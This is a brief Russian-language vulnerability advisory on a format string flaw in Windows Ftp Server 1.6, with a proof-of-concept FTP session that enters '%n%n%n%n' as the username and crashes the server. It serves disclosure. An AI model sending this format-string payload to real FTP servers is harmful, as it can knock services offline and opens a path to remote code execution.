Программа: Windows Ftp Server 1.6
Уязвимость форматной строки обнаружена в Windows Ftp Server. Удаленный пользователь может выполнить произвольный код на целевой системе.
Сервер не определяет форматную строку при обработке данных, представленных пользователем в поле 'username'.
Пример/Эксплоит:
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>ftp 127.0.0.1
Connected to 127.0.0.1.
220 Welcome to Windows FTP Server
User (127.0.0.1:(none)): %n%n%n%n
Connection closed by remote host.
C:\WINDOWS\system32>
